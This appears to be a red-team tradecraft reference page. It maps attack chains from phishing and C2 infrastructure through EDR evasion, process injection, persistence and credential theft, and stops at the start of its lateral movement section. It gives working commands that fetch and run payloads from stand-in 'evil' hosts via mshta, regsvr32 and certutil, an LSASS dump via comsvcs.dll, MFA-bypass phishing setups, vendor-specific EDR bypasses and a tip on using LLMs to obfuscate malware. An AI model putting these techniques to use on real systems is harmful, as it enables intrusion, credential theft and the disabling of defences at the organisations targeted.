Red Team Mapper v3.0

// Operation Flow Chains

End-to-end attack chains showing how red team operations connect from infrastructure through impact.

Classic Phishing → Beacon → DA

Build C2 + redirectors

›phish

HTML smuggle → ISO/LNK

›execute

Shellcode loader

›beacon

C2 callback

›AD attack

Domain Admin

EvilGinx MFA Bypass → Token Theft → Cloud Access

Setup EvilGinx proxy

›lure email

Victim enters creds + MFA

›capture

Session cookie stolen

›replay

Authenticated as user

›pivot

M365 / Azure / On-prem

Loader → Unhook → Inject → Beacon (EDR Bypass Chain)

Custom loader (Rust/C)

›patch AMSI

AMSI + ETW bypass

›fresh ntdll

Unhook EDR

›syscall inject

Process injection

›sleep obf

Stable C2 beacon

DLL Sideload → Signed Binary → Persistence

Find signed EXE + DLL

›craft DLL

Proxy DLL (exports)

›drop pair

Signed EXE loads our DLL

›persist

Registry Run key / schtask

›beacon

Persistent C2

Lateral Movement → Pivot → Exfil

Dump creds (LSASS/DPAPI)

›PtH / PtT

Move to high-value target

›SMB pipe

Deploy beacon (child)

›Snaffler

Collect sensitive data

›staged exfil

HTTPS C2 exfil

ZIP → LNK → Signed EXE → DLL Sideload → C2 (Gold Standard)

ZIP (inner dir + multi-file)

›user clicks

LNK trigger

›launches

Signed EXE (reputation pass)

›sideload

Unsigned malicious DLL

›beacon

C2 + decoy PDF opens

search-ms → WebDAV → LNK → Sideload (Protocol Handler Abuse)

Phishing email / site

›search-ms: URI

Explorer shows WebDAV files

›appears local

User clicks LNK

›sideload

Signed EXE + malicious DLL

›callback

C2 beacon

RDP File → PyRDP → TypeLib COM Hijack (Phish-to-Persist)

Victim opens .rdp file

›connects

PyRDP server + auto-exec

›enum dirs

Deploy DLL + BAT + SCT

›hijack

TypeLib COM persistence

›self-clean

Persistent backdoor

ClickFix → Clipboard PowerShell → Download → Execute

Fake CAPTCHA page

›checkbox

JS copies PS to clipboard

›Win+R paste

PowerShell download cradle

›fetch

Stage 2 payload

›execute

C2 beacon + persist

Device Code Phish → Token Capture → M365 → Cloud Lateral

Dynamic device code gen

›phish link

Victim enters code + MFA

›capture

Access + refresh tokens

›enumerate

M365 / Azure / SharePoint

›persist

App registration + passkey

WDAC Policy Deploy → Reboot → EDR Killed → Full Control

Deploy custom WDAC policy

›blocks EDR

Policy blocks EDR drivers

›reboot

EDR fails to start

›operate

Unmonitored system

›extract

Full credential dump + exfil

ADCS ESC4 → Template Modify → ESC1 → Golden Cert

Find vulnerable ESC4 template

›modify

Enable SAN on template

›wait ≤8h

Request cert as DA

›auth

PKINIT TGT → DA access

BadSuccessor (dMSA) → Server 2025 → Domain Admin

Find dMSA-enabled DC

›enum

Exploit dMSA delegation

›SharpSuccessor

Impersonate any account

›escalate

Domain Admin

vSphere Snapshot → .vmem Download → Credential Extraction

vSphere admin access

›snapshot

Download .vmem + .vmsn

›vmss2core

Convert to .dmp

›MemProcFS

Extract LSASS creds offline

On-Prem AD → SeamlessSSO → Silver Ticket → Cloud Token

Dump AZUREADSSOACC$ hash

›forge

Kerberos Silver Ticket

›SOAP

DesktopSsoToken

›exchange

Azure access + refresh token

›cloud access

Full Azure / M365 control

NTLM Reflection → SMB to LDAPS → Full Domain Compromise

Coerce NTLM auth

›CVE-2025-33073

SMB to LDAPS relay

›bypass signing+binding

Modify AD objects

›RBCD/ShadowCred

Domain compromise

Shadow Creds → Coercion → LDAP Relay → Persistence

Coerce auth (Coercer)

›relay

LDAP relay + msDS-KeyCredentialLink

›flags=0x02

keycred bypass patch

›TGT

Persistent access via Shadow Credentials

MSSQL Linked Server → Multi-Hop → CREATE ASSEMBLY → Implant

Initial MSSQL access

›linked server

Chain through links

›enable CLR

CREATE ASSEMBLY .NET DLL

›execute

C2 implant in MSSQL process

// Reconnaissance

Pre-engagement intelligence gathering to map attack surface, identify vulnerabilities, and plan entry points.

INFRA

Supply Chain Mapping

Identify third-party dependencies and vulnerabilities in the target's supply chain.

Dependency scanning: Tools like Deps.dev or Snyk to analyze public repositories for vulnerable packages.
CI/CD poison: Target GitHub Actions or Jenkins pipelines for code injection.
OSINT sources: Shodan, Censys for exposed services; GitHub dorks for leaked configs.
Attack paths: Exploit misconfigured dependencies to gain initial access or escalate.
OPSEC: Use anonymous proxies for scans to avoid early detection.

// C2 Frameworks Deep Dive

Command and Control is the backbone of any red team operation. Choosing the right framework determines your capabilities, OPSEC profile, and flexibility.

⚠️

Default Configs = Burned Operation. Every major C2 framework has signatured default configurations. Cobalt Strike's default JARM fingerprint, Sliver's Go runtime, and Havoc's default HTTP headers are all detected. Customize everything before deployment.

C2

Cobalt Strike

Industry standard — Beacon payload, Malleable C2, mature ecosystem

Beacon: Staged/stageless, HTTP/HTTPS/DNS/SMB/TCP listeners
Malleable C2: Full control over network indicators — mimic any HTTP traffic pattern
BOFs (Beacon Object Files): Run compiled C in Beacon's memory — no fork & run
Sleep mask: Encrypt Beacon in memory during sleep — evade memory scanners
OPSEC concerns: Default configs heavily signatured — MUST customize profiles, watermarks tracked
CS 4.12 UDC2: ICMP channel + REST API for AI/automation integration
Arsenal Kit: Modify artifact/resource/sleep mask/process injection behavior

C2

Havoc

Open-source, modern C2 — Demon agent, extensible via Python/C

Demon agent: Position-independent, supports indirect syscalls natively
Sleep obfuscation: Ekko/Zilean built-in — encrypts agent in memory during sleep
No fork & run: Inline execution by default — better OPSEC than CS fork & run
Extensible: Python API for custom commands, modules, and post-exploitation
Listeners: HTTP/HTTPS with customizable profiles
Free & open source — actively developed, growing community

C2

Sliver

Open-source by BishopFox — implants in Go, multi-protocol

Implants: Compiled Go binaries — cross-platform (Windows/Linux/macOS)
Protocols: mTLS, WireGuard, HTTP(S), DNS — all encrypted by default
Multiplayer: Multiple operators, role-based access, real-time collaboration
Armory: Extension/alias package manager (BOFs, .NET assemblies)
OPSEC note: Go implants are large (~10MB+), runtime is signatured by some EDRs
Pivots: TCP/Named pipe pivots for internal C2 chains

C2

Mythic

Collaborative, multi-agent C2 platform — containerized architecture

Multi-agent: Apollo (C#), Athena (.NET), Poseidon (Go), Medusa (Python), Merlin
Containerized: Each agent/C2 profile runs in Docker — modular, easy to extend
UI: Web-based dashboard with task tracking, file browser, MITRE ATT&CK mapping
Custom agents: Build your own agent in any language with the Mythic agent framework
P2P: Agent-to-agent communication for internal pivoting

C2

Brute Ratel C4

Commercial adversary simulation — Badger agent, focused on EDR evasion

Badger: Designed from the ground up for EDR evasion
Syscalls: Indirect syscalls by default — avoids user-mode hooks entirely
Sleep obfuscation: Built-in memory encryption during callbacks
Stack spoofing: Return address spoofing to evade stack-based detections
DOH: DNS-over-HTTPS for C2 communication
teamsc2: Routes C4 traffic over Microsoft Teams API — blends perfectly

C2INFRA

Covert C2 Channels

Living-off-the-cloud redirectors — route C2 through infrastructure defenders can't block

GraphStrike: Routes Cobalt Strike traffic over Microsoft Graph API — blends into M365
ProxyBlob: Reverse SOCKS5 over Azure Blob Storage — bypasses Netskope
Turnt: SOCKS proxy over TURN servers (Teams/Zoom endpoints)
Stillepost: Proxy C2 HTTP through Chromium via Chrome DevTools Protocol
teamsc2: Brute Ratel C2 channel via Microsoft Teams API
convoC2: Conversation-based C2 via messaging platform APIs
CS-EXTC2-NTP: Cobalt Strike External C2 over NTP (UDP 123) — universally allowed

// Red Team Infrastructure

Your infrastructure IS your OPSEC. Poor setup = burned operation. Every component needs separation, redundancy, and deniability.

Infrastructure Architecture

OPERATOR MACHINE
└── VPN / Tor / Jump Box // Never connect directly to C2 team server
    └── C2 TEAM SERVER (VPS)
        ├── HTTPS Redirector nginx/Apache reverse proxy → categorized domain
        │   ├── CDN Layer CloudFront / Azure CDN / Fastly
        │   └── Domain Fronting SNI = legit.com, Host: = evil.com
        ├── DNS Redirector socat UDP relay or DNS-over-HTTPS
        ├── SMB Pipe Listener Internal pivots, no egress needed
        └── Payload Hosting S3 / Azure Blob / GitHub raw (burned after use)
PHISHING INFRASTRUCTURE (separate from C2!)
├── SMTP Server Postfix + DKIM + SPF + DMARC → pass email checks
├── GoPhish / Custom Campaign management + tracking
├── EvilGinx Transparent proxy for MFA bypass (AitM)
└── Landing Pages Cloned portals • HTTPS • categorized domains
DOMAIN STRATEGY
├── Age domains >30 days before use // Fresh domains = red flag
├── Get categorized (Health, Finance, Tech) // Bluecoat, VirusTotal, Fortiguard
├── Separate domains: phishing / C2 / payload hosting // Burn one ≠ burn all
└── Valid SSL from Let's Encrypt or purchased CA // Self-signed = instant detection

INFRA

Redirectors

Never expose your team server — always proxy through redirectors

HTTPS Redirector: nginx reverse proxy — filter by User-Agent, URI, headers
Apache mod_rewrite: Conditional forwarding based on request attributes
socat: Simple TCP/UDP relay: socat UDP4-RECVFROM:53,fork UDP4-SENDTO:c2server:53
CDN fronting: CloudFront, Azure CDN — C2 traffic looks like CDN HTTPS
Separation: Long-haul (persistent), short-haul (interactive), phishing (burned after campaign)
Burn protocol: If redirector is flagged → replace VPS + domain, team server untouched

INFRA

Malleable C2 Profiles

Shape your C2 traffic to look like legitimate services

Purpose: Define how Beacon communicates — HTTP headers, URIs, encoding, timing
Mimic: jQuery, Amazon, Google APIs, Microsoft update traffic
Critical settings: set sleeptime, set jitter, set useragent
JARM fingerprint: Default CS JARM is signatured — use custom TLS or nginx in front
Sourcepoint: Malleable C2 profile generator — automates evasive profiles
Test: c2lint to validate profile before deployment

INFRAOPSEC

Infrastructure OPSEC

Operational security for attack infrastructure — don't let your boxes betray you

Hostname OPSEC: Always rename attack boxes to match client naming convention. Kali hostnames are instantly flagged
fakeprinter: Python scripts making your box appear as HP printer on expected ports
Artillery: Honeypot alerter on attack box — detect defenders probing your infra
RedELK: Red Team's SIEM — operational logging, monitoring, blue team detection
Ghostwriter: Report writing + infrastructure management platform
Environmental keying: Offload checks to server-side — DoH for DNS-based keying

INFRA

Infrastructure as Code

Automate infra deployment — spin up/tear down in minutes

Terraform: Provision VPS, DNS records, CDN, and firewall rules
Ansible: Configure team servers, install tools, deploy redirectors
Red-Baron: Terraform modules specifically for red team infra
Nebula: Pre-built red team infrastructure templates
Benefits: Consistent deployments, fast teardown, version-controlled, repeatable
Tip: Keep Terraform state encrypted — it contains all IP addresses and configs

// Initial Access

Getting that first callback. Phishing remains the most common vector, but techniques evolve constantly as email gateways and endpoint protections improve.

ACCESS

HTML Smuggling

Deliver payloads through HTML/JS — bypasses email gateways and proxies

Embed payload as base64 or encrypted blob inside an HTML file
JavaScript decodes and offers the file for download when opened in browser
Bypasses: Email attachment scanners only see an HTML file, not the payload inside
Blob method: window.URL.createObjectURL(new Blob([bytes]))
Encryption: XOR or AES encrypt the blob, derive key from URL fragment or user input
Pair with: ISO/ZIP/VHD container to bypass MOTW (Mark-of-the-Web)

ACCESS

Macro-less Payloads

Microsoft blocked VBA macros by default — post-macro era vectors

LNK files: Shortcut with PowerShell/cmd command line — still very effective
ISO / IMG / VHD: Container files that auto-mount — contents bypass MOTW (pre-patch)
OneNote (.one): Embed scripts, HTA, or EXE as attachments — social engineer the click
CHM (Compiled HTML Help): Execute embedded scripts via hh.exe
XLL (Excel Add-in): Native DLL loaded by Excel — code execution on open
Trend: Shift toward LNK + DLL sideloading as primary delivery mechanism

PHISH

Credential Phishing (AitM)

Adversary-in-the-Middle proxies — capture credentials AND MFA tokens

EvilGinx 3: Transparent reverse proxy — sits between victim and real login page
Captures username, password, and session cookies after MFA
Modlishka: Similar transparent proxy — real-time credential harvesting
MFA bypass: Works against TOTP, push notifications, SMS — only FIDO2/WebAuthn is resistant
Cookie replay: Import stolen session cookie into browser → fully authenticated session

ACCESSCLOUD

Device Code Phishing

Bypass MFA including FIDO2 — capture OAuth tokens through device authorization flow

Bypasses FIDO2: Device code flow captures full access+refresh tokens, bypassing phishing-resistant MFA
AWS SSO variant: aws sso login enables identical attack — no CA policy exists to block it
Vishing combo: Walk target through code entry over phone call — "verify your identity" pretext
GraphSpy: Backend for device code polling + token storage + auto-capture
TokenPhisher / SquarePhish: Dedicated frameworks
Persist: Captured refresh tokens survive password changes — add app registration

PHISH

Email Delivery & Inbox Landing

Getting past email gateways into the inbox — sender reputation is everything

LarkSuite (ByteDance): Free custom domain accounts, no outbound content filtering, 20min setup
SharePoint spoof: Remove Exchange license → share SPO file → sends from no-reply@sharepointonline.com with DMARC pass
Trusted platform abuse: DocuSign, AdobeSign, SurveyMonkey, Microsoft Forms — all from allowlisted domains
iCal organizer spoof: Outlook renders calendar invites based on ICS organizer field, not actual sender
Hidden text salting: Insert invisible text in email HTML to confuse keyword-based detection engines

ACCESS

In-Memory Webshells

Fileless webshells that live entirely in memory — no artifacts on disk

Godzilla: Java memshell — widespread adoption, runs entirely in JVM memory
GhostWebShell: ASP.NET in-memory webshell by MDSec — no file dropped
IceApple: IIS/ASP.NET post-exploitation — hooks HttpApplication pipeline for persistent access
Detection gap: Traditional file integrity monitoring and AV scanning miss memory-resident webshells
Persistence: Survives until application pool recycles or server reboots

ACCESS

External Service Exploitation

VPN, Citrix, OWA, VDI — internet-facing services with weak auth

Password spraying: Slow spray against OWA, VPN portals, Citrix
Credential stuffing: Breached credentials tested against corporate SSO
VPN without MFA: Single-factor VPN = direct internal network access
OWA / Exchange: Valid creds → email access → internal phishing from trusted sender
Tools: trevorspray, SprayingToolkit, MailSniper
OPSEC: Respect lockout policies, spray low and slow (1 attempt per 30min+)

ACCESS

Physical Access / USB

When digital access fails — physical implants, drops, and social engineering

USB Rubber Ducky: HID device that types payloads as keyboard input — bypasses USB restrictions
Bash Bunny: Multi-vector USB attack tool (HID + storage + network)
USB drops: Leave weaponized USBs in parking lots / lobbies / break rooms
LAN Turtle: Covert inline network implant — reverse shell over cellular
O.MG Cable: USB cable with embedded implant — keystroke injection + WiFi C2
Tailgating: Follow employees through badge-access doors — physical security test

// Payload Development

The payload is what runs on the target. Loaders, shellcode, and delivery mechanisms determine whether you get caught in seconds or maintain access for months.

PAYLOAD

Shellcode Generation

Raw position-independent code — the foundation of every payload

Cobalt Strike: Attacks → Packages → Windows Executable (Stageless) → Raw
Donut: Convert .NET assemblies, PE files, VBS, JS into position-independent shellcode
Donut -i beacon.exe -o beacon.bin -a 2 -f 1 — x64, raw format
sRDI: Shellcode Reflective DLL Injection — convert any DLL to shellcode
Custom: Write your own in C/Rust — avoid known signatures entirely
Encryption: Always encrypt shellcode at rest — XOR, AES, RC4 with runtime decryption

PAYLOAD

Shellcode Loaders

The code that decrypts, allocates, and executes your shellcode

Basic flow: Read encrypted shellcode → decrypt → allocate RWX memory → execute
Better: NtAllocateVirtualMemory (syscall) → NtWriteVirtualMemory → NtCreateThreadEx
Callback execution: Use Windows callbacks to trigger shellcode (EnumFonts, CreateFiber, etc.)
Languages: C/C++ (smallest, fastest), Rust (safe + small), Nim (emerging), Go (cross-platform)
Separation: Store encrypted shellcode separately (resource, URL, registry) — not embedded
Sandbox evasion: Check for debugger, sleep acceleration, low RAM, no user interaction

PAYLOAD

DLL Sideloading

Abuse DLL search order of signed binaries to load malicious DLLs

Concept: Signed EXE looks for a DLL → place your DLL where it searches first
Proxy DLL: Forward all original exports to the real DLL + add malicious code
Finding candidates: Spartacus, DLLSpy, Process Monitor (filter: NAME NOT FOUND)
Why it works: The signed EXE loads your DLL — EDR sees trusted process loading DLL
DllShimmer: Auto-generates proxy DLL source for any DLL
OPSEC: Choose EXEs that normally load DLLs from their directory

PAYLOAD

Advanced Payload Engineering

PIC compilation, metamorphic cross-compilation, and ML-based evasion

EPIC: Cross-platform C/C++ to PIC shellcode builder — modular, minimal libc
EPIC RBX trick: -ffixed-rbx GCC flag reserves RBX for global R/W context across PIC
Dittobytes: Metamorphic cross-compilation — each compile produces unique binary
Crystal Palace: Mudge's position-independent DLL loader linker
EvadeX: Commercial C# obfuscator effective against ML detections
Shellcode encoding: Simple XOR sufficient — RC4 via SystemFunction032/33 specifically detected by EDRs
T-1: ML-based sandbox detection shellcode loader

PAYLOAD

LOLBins (Living Off the Land)

Abuse legitimate Windows binaries to execute code — no custom EXE needed

mshta.exe: Execute HTA files — mshta http://evil/payload.hta
rundll32.exe: Load and execute DLL exports — rundll32 payload.dll,EntryPoint
msbuild.exe: Compile and execute inline C# from .csproj/.xml files
regsvr32.exe: Load COM scriptlets — regsvr32 /s /n /u /i:http://evil/payload.sct scrobj.dll
certutil.exe: Download files — certutil -urlcache -split -f http://evil/payload.exe
Reference: LOLBAS Project (lolbas-project.github.io) — full database

PAYLOAD

Python & .NET Payload Delivery

Abuse legitimate runtimes for payload execution — blend with dev environments

Python environment drop: Deploy pythonw.exe + ctypes shellcode loader in dependencies — schtask persist
MSSQL CREATE ASSEMBLY: Load managed .NET DLL C2 implant directly into MSSQL process
Inline-EA: CS BOF for evasive inline .NET assembly execution — no fork & run
AppDomainManager injection: Hijack .NET AppDomainManager to load malicious assemblies
koneko: Cobalt Strike shellcode loader with advanced evasion

// Defense Evasion

Modern EDRs hook userland APIs, scan memory, inspect call stacks, and correlate telemetry. Every technique here addresses a specific detection mechanism.

🚨

EDR Detection Layers (6): Static Signatures → Userland Hooks → ETW Telemetry → Kernel Callbacks → Memory Scanning → Behavioral/Call Stack. Effective evasion addresses all layers, not just AV signatures.

EDR Detection Layers & Bypasses

LAYER 1: STATIC SIGNATURES
├── AV/YARA rules on disk          // Bypass: encryption, obfuscation, packing
└── Import table analysis         // Bypass: dynamic resolution, syscalls
LAYER 2: USERLAND HOOKS
├── ntdll.dll hooks               // Bypass: unhooking, direct syscalls
└── AMSI (amsi.dll)               // Bypass: patch AmsiScanBuffer, hardware BP
LAYER 3: ETW TELEMETRY
├── EtwEventWrite                 // Bypass: patch to ret, NtTraceEvent hook
└── Threat Intelligence ETW       // Bypass: disable provider GUID
LAYER 4: KERNEL CALLBACKS
├── PsSetCreateProcessNotifyRoutine  // Can't bypass from userland
└── ObRegisterCallbacks           // Process handle ops (LSASS access)
LAYER 5: MEMORY SCANNING
├── RWX region detection          // Bypass: RW → RX flip, no RWX
└── Unbacked memory execution     // Bypass: module stomping, phantom DLL
LAYER 6: BEHAVIORAL / CALL STACK
├── Call stack analysis           // Bypass: stack spoofing, return address overwrite
└── Suspicious API call chains    // Bypass: indirect execution, callbacks

EVASION

AMSI Bypass

Antimalware Scan Interface — scans PowerShell, .NET, VBScript, JScript at runtime

Patch AmsiScanBuffer: Overwrite first bytes with ret — all scans return clean
Hardware breakpoints: Set BP on AmsiScanBuffer, modify args in exception handler — no memory patch needed
WriteProcessMemory patch: Internally modifies memory perms, avoids VirtualProtect trigger
No C3 (RET) byte: Defender detects C3 written to function prologues — use POP RAX; JMP RAX
Null-AMSI: Uses .NET Reflection to set amsiInitFailed — all subsequent scans return clean
Important: AMSI patch must happen before loading any .NET tools or PS scripts

EVASION

Direct / Indirect Syscalls

Call the kernel directly — bypass all userland hooks entirely

Direct syscalls: Embed syscall instruction in your code — never touch ntdll.dll
Indirect syscalls: Jump to the syscall instruction inside ntdll.dll — legitimate return address
SysWhispers3: Generate syscall stubs with multiple bypass options
HellsGate: Dynamically resolve syscall numbers at runtime from ntdll
HalosGate: Resolve syscall numbers even when ntdll is hooked (neighbor stub technique)
Why indirect: Direct syscalls have return address outside ntdll — detectable by stack analysis

EVASION

Sleep Obfuscation

Encrypt the implant in memory during sleep — evade periodic memory scans

Problem: C2 implants sleep 90%+ of the time — memory scanners look for implant signatures
Ekko: Use CreateTimerQueueTimer to chain ROP: RW → encrypt → sleep → decrypt → RX
Foliage: APC-based sleep obfuscation using NtQueueApcThread
Deathsleep: Unmap implant memory entirely during sleep — nothing to scan
Heap encryption: Encrypt all heap allocations, not just implant image
OPSEC: The encryption itself creates patterns — advanced EDRs detect timer-based chains

EVASION

API Unhooking

Remove EDR hooks from ntdll.dll — restore clean syscall stubs

Fresh copy: Read clean ntdll.dll from disk, overwrite .text section of loaded ntdll — all hooks removed
Perun's Fart: Suspend all threads, unhook, resume — avoids race conditions
KnownDlls: Read from \KnownDlls\ntdll.dll kernel object — always clean
From suspended process: Spawn suspended process → read its ntdll (before EDR hooks) → copy
Detection: EDRs check ntdll integrity — some re-hook after unhooking detected

EVASION

Call Stack Spoofing

Fake the call stack to hide where execution originated — defeat stack-walking detections

Problem: EDRs walk the call stack — return addresses pointing to unbacked memory = alert
ThreadStackSpoofer: Replace return addresses with pointers to legitimate module code
SilentMoonwalk: Desync the call stack before API calls, restore after
Return address overwrite: Before each sensitive API call, overwrite stack with legitimate RAs
TLS callbacks: Use TLS directory callbacks for execution — unusual call origin

EVASION

EDR-Specific Bypasses

Vendor-specific weaknesses for major EDR products

Cortex XDR: ~50+ excluded EXE names in registry — naming binary apache.exe prevents hook DLL loading
CrowdStrike time desync: Manipulating system clock — actions don't appear in console (15min window)
CrowdStrike drag-and-drop: Copy-paste of SAM/SYSTEM hives flagged, but drag-and-drop uses different API
SentinelOne VEH bypass: Insert VEH handler with arg 0 (append) — S1 doesn't re-add its handler
7-Zip raw disk: Browse \\.\PhysicalDrive0 in 7-Zip to copy SAM/SYSTEM — most EDRs don't monitor this
EDRSilencer: Uses Windows Filtering Platform to block EDR network communications
WDAC EDR kill: Deploy WDAC policy blocking EDR drivers → reboot → EDR fails to start

EVASION

Code Signing & Reputation Evasion

Abuse certificate trust and SmartScreen reputation to bypass static defenses

Expired certificate signing: SmartScreen treats any certificate as less suspicious — expired certs work
Elastic EDR gap: Rules check for "unsigned" but expired certs return errorExpired — bypasses check
Sources: Find leaked OV certs on GitHub, VirusTotal, open S3 buckets (GrayhatWarfare)
Limelighter: Generate fake/spoofed code signatures for DLLs, EXEs, MSIs
File inflation: Defender doesn't scan files >50MB. Falcon cloud ML default cutoff ~35MB

EVASION

Malware Virtualization & Anti-Analysis

Run malicious code in custom VM interpreters — evade static, behavioral, and memory analysis

RISC-V VM: riscy-business — run code in RISC-V virtual machine interpreter, no executable memory needed
Commercial: Themida, VMProtect — production-grade code virtualization and packing
Module overloading: Load PE on top of legitimate module's memory space — code appears backed by legit DLL
Donut customization: Default Donut has detectable AMSI patching + 10KB signatured bootstrap. Remove aPLib, externalize loader
LLM-assisted obfuscation: Prompt LLMs to reorder code, introduce junk with volatile/register

// Process Injection Techniques

Running your code inside another process — the core tradecraft of any implant. Each technique has different detection signatures, OPSEC tradeoffs, and requirements.

INJECT

Classic Injection (VirtualAllocEx)

The textbook method — heavily detected but worth understanding as a baseline

Why detected: Every step triggers kernel callbacks — cross-process handle + RWX + remote thread = instant alert
EDR sees: Process handle access (ObRegisterCallbacks), memory allocation, thread creation
Only useful: In unmonitored environments or as learning exercise

INJECT

Module Stomping / Phantom DLL

Overwrite a legitimate DLL's .text section with shellcode — execution from backed memory

Module stomping: Load a benign DLL → overwrite its .text with shellcode → execute
Memory region shows as backed by a legitimate DLL on disk
Phantom DLL: Load a DLL that doesn't exist on disk (transaction rollback) — backed but no file
OPSEC: Choose a DLL that's normally loaded by the target process

INJECT

Threadless Injection

No thread creation or APC queue — hook APIs in target process to trigger shellcode naturally

Concept: Place hooks on regularly-called APIs in the target process
When the target process naturally calls the hooked API, shellcode triggers automatically
No thread creation: No CreateRemoteThread, no APC, no thread hijacking — purely event-driven
Detection status: Not detected by any major vendor as of testing — fundamentally different from traditional injection
OPSEC: The gold standard for process injection

INJECT

Early Cascade Injection

Intercept process creation at the earliest stage — before EDR hooks are established

Concept: Intercept the DLL loading cascade during process initialization
DEBUG_PROCESS: Use debug flag instead of CREATE_SUSPENDED — different process creation path
Race condition: Wins the race against EDR hook installation by operating earlier in the cascade
Thread Name-Calling: Use thread description API (NtSetInformationThread) to write shellcode via thread name primitive
Hardware BPs without SetThreadContext: Use INT3 + VEH to set DR0-DR3 debug registers — avoids ETW-Ti events

INJECT

APC Injection & Thread Pool

Queue shellcode as APC or via Windows Thread Pool for natural execution

Early Bird variant: Create process suspended → write shellcode → APC on main thread → resume
Early Bird executes before EDR DLL is loaded into the new process
Thread Pool TP_WORK: Create work item pointing to shellcode — submitted to thread pool
Thread pool threads have legitimate call stacks — harder to distinguish from normal work
Used by Nighthawk C2 — very effective against call stack analysis

INJECT

Callback-based & PE File Injection

Use Windows API callbacks and Cordyceps technique for alternative execution

Callback techniques: EnumFonts, EnumWindows, CreateFiber, CreateTimerQueueTimer, CertEnumSystemStore
Why: No CreateThread/CreateRemoteThread — execution triggered by benign-looking API call
Cordyceps (PE injection): Reuse target PE's IAT and data sections, change execution flow — no process injection APIs
RedBackdoorer: Implements Cordyceps technique for PE file backdooring
HTTP.sys backdoor: Kernel-mode HTTP.sys API — no admin needed, shows as PID 4 (System)

// Persistence Mechanisms

Surviving reboots, credential rotations, and remediation. The best persistence is the one that looks like normal system behavior.

PERSIST

Registry & COM Hijacking

Run keys and COM object replacement — stealthy, triggered by legitimate activity

HKCU\...\Run: Per-user, no admin needed — point to signed EXE with DLL sideload
COM Hijacking: Windows looks up COM objects in HKCU first, then HKLM — create HKCU override
Find targets: Process Monitor — filter for RegOpenKey with NAME NOT FOUND on HKCU CLSIDs
HKCU\Software\Classes\CLSID\{CLSID}\InprocServer32 → point to your DLL
OPSEC: Extremely stealthy — triggered by normal system activity, no new autorun entry visible
TypeLib COM Hijacking: Modify HKCU TypeLib entries — very rarely monitored, self-cleaning

PERSIST

Scheduled Tasks & WMI Events

Reliable system scheduler-based persistence with fileless WMI alternative

COM-based creation: Use ITaskService COM interface — avoids schtasks.exe command line logging
Hide the task: Delete SD registry value at HKLM\...\Schedule\TaskCache\Tree\TaskName
WMI subscriptions (fileless): EventFilter + EventConsumer + Binding — stored in WMI repository
Triggers: Process start, user logon, timer interval, USB insert
SharpEventPersist: Create WMI event subscriptions from .NET
Detection: Event 4698 (task created), Sysmon Event 19/20/21 (WMI events)

PERSIST

DLL Sideloading Persistence

Signed binary + malicious DLL — survives reboots via autorun

Most OPSEC-friendly persistence: Combines signed binary trust with DLL hijack
Setup: Drop signed EXE + proxy DLL to persistent location (AppData, ProgramData)
Trigger: Scheduled task, Run key, or service pointing to the signed EXE
Proxy DLL: Forwards all legitimate exports + executes shellcode in DllMain
Finding pairs: Spartacus, WFH (Windows Feature Hunter)

PERSIST

Browser Extension & Office Template

Silent Chrome extension install and Office trusted location persistence

Chrome extension: Silent install — C2 via Native Messaging API through browser process
Cookie access: Extension reads cookies, session tokens, and form data from all sites
XLSTART persistence: Copy XLAM to XLSTART trusted location — auto-loads when Excel opens
No MOTW: Trusted locations exempt from MOTW — VBA runs without prompts
DNS TXT persistence: Store PS expressions in DNS TXT records — LNK evaluates TXT record on login

// Credential Access

Harvesting credentials from memory, disk, and user behavior. Every credential type enables different lateral movement options.

⚡

LSASS is the #1 EDR alert trigger. Opening any handle to LSASS triggers ObRegisterCallbacks immediately. Use remote methods (DCSync, secretsdump), handle duplication, or physical memory access to avoid direct LSASS access.

CRED

LSASS Evasive Dumping

Advanced techniques to dump LSASS while evading modern EDR detections

Handle duplication: Scan all processes for existing LSASS handles → duplicate — avoids opening direct handle
nanodump: Duplicated handle dump + encrypted chunks directly to operator — never touches disk
Remote physical memory: physmem2profit — remotely map physical memory and create LSASS minidump
Dump to remote share: Write LSASS dump directly to SMB share or WebDAV — bypasses local FS monitoring
7-Zip raw disk: Browse \\.\PhysicalDrive0 → copy SAM/SYSTEM — not locked at raw disk level
comsvcs.dll LOLBin: rundll32 comsvcs.dll MiniDump PID file full

CRED

DPAPI & Browser Credential Harvesting

Decrypt browser passwords, cookies, Wi-Fi keys, certificates stored via Windows DPAPI

Chrome App-Bound Encryption bypass: Run decryption binary from C:\Program Files\Google\Chrome\Application\
Custom extension: Chrome extension accesses cookies directly — bypasses app-bound encryption
ChromeKatz BOF: In-memory Chrome cookie/password dump via Beacon
DonPAPI: Automated DPAPI harvesting across multiple hosts remotely
dploot: Python DPAPI looting — masterkeys, credentials, vaults, browser
Domain Backup Key: DCSync retrieves DPAPI domain backup key — decrypt any user's secrets

CRED

Kerberos Ticket Harvesting

Extract TGTs and TGS tickets from memory for pass-the-ticket attacks

Rubeus dump — extract all tickets from current logon session
Rubeus monitor /interval:5 — monitor for new TGTs (useful on unconstrained delegation hosts)
Linux: Tickets stored in /tmp/krb5cc_* or kernel keyring
ccache files: Copy and use with impacket tools — export KRB5CCNAME=ticket.ccache
Key material: NT hash + AES256 key enable forging tickets without touching LSASS

CRED

Sensitive File Discovery

Find passwords, keys, and secrets in files across the network

Snaffler: Automated sensitive file discovery across SMB shares
Finds: passwords in configs, private keys, KeePass databases, connection strings
Seatbelt: Local host survey — browser data, credentials, tokens, interesting files
Common targets: web.config, appsettings.json, .env files, PowerShell history, unattend.xml
SharePoint / Confluence: Internal wikis often contain credentials in pages
Git repos: trufflehog, GitLeaks — scan for secrets in commit history

CRED

All-in-One Credential Dumping

Grab everything at once — browsers, Wi-Fi, mail clients, databases, sysadmin tools

LaZagne: All-in-one — browsers, Wi-Fi, mail (Outlook, Thunderbird), databases, sysadmin tools (FileZilla, PuTTY, WinSCP)
Coverage: 40+ applications supported across Windows and Linux — single binary, no dependencies
BrowserSnatch: Multi-browser harvesting — Chrome, Firefox, Edge, Brave, Opera
RemoteMonologue: DCOM-based NTLMv1/v2 extraction from remote machines without LSASS
GhostKatz: Physical memory-based LSASS reading — bypasses PPL and process-level protections
SCCMDecryptor-BOF: BOF for decrypting SCCM NAA, task sequences, and collection variables

// Lateral Movement

Moving through the network after initial compromise. Each method has different port requirements, authentication types, and OPSEC signatures.

ℹ️

Risk Levels: PsExec (HIGH — service creation 7045), WMI execution (MEDIUM — WmiPrvSE parent), DCOM execution (LOW-MED), SCShell service config change (LOW — Event 7040, not 7045), Named pipe C2 (LOW — no new process). Prefer fileless and port-135-only techniques where possible.

LATERAL

Pass-the-Hash / Pass-the-Ticket / Overpass

Reuse captured credentials without knowing plaintext passwords

